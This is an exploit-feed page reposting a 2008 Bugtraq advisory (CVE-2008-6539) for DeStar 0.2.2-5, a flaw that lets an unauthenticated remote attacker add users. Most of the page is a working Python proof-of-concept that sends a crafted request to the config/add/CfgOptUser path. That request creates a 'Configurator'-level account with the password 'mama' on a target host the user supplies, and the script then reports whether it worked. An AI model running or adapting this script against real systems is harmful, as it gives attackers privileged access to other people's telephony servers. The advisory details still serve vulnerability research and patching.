|
Feeds -
Exploits
|
|
Written by nonroot
|
|
Tuesday, 07 April 2009 22:53 |
Destar Add User Unauthorized Access Vulnerability
-\\Bugtraq ID:
28426
-\\Class:
Access Validation Error
-\\CVE:
CVE-2008-6539
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 24 2008 12:00AM
-\\Updated:
Apr 07 2009 08:46PM
-\\Credit:
nonroot
-\\Vulnerable:
DeStar DeStar 0.2.2-5
-\\Discussion
Destar is prone to an unauthorized-access vulnerability.
An unauthorized attacker can exploit this issue to add arbitrary users to the affected
application.
Destar 0.2.2-5 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
An attacker could exploit this issue through a browser.
The following exploit code is available:
===============================================================
28426.pl
^^^^^^^^^
#
#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and exploit coded by a non root user
#
# http://nonroot.blogspot.com
#
# Enero 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $python ./exploit_code.py
#
# required: urllib,urllib2 sys and re
#
import urllib,urllib2
import sys,re
print "Target host: i.e: http://127.0.0.1:8080/"
host=raw_input("Target host ( include http and /): ")
#info for the new user
#
user='mama'
password='mama'
source_ip='127.0.0.9'
phone=''
level='Configurator'
language='en'
#
#
req = urllib2.Request(host)
adduser = urllib.urlencode({'name': user, 'secret': password, 'pc' : source_ip, 'submit' : "Submit", 'phone' : phone, 'level' : level, 'language' : language})
req.add_header('X_FORWARDED_FOR','')
req = urllib2.Request(host+"config/add/CfgOptUser")
r = urllib2.urlopen(req,adduser)
data=r.read()
lookup=re.compile("There were errors").search
match=lookup(data)
if not match:
print "Ok, now go and test your user at:",host
else:
print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
sys.exit(2)
sys.exit(0)
# milw0rm.com [2008-03-23]
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--DeStar Homepage
http://destar.berlios.de (DeStar)
|
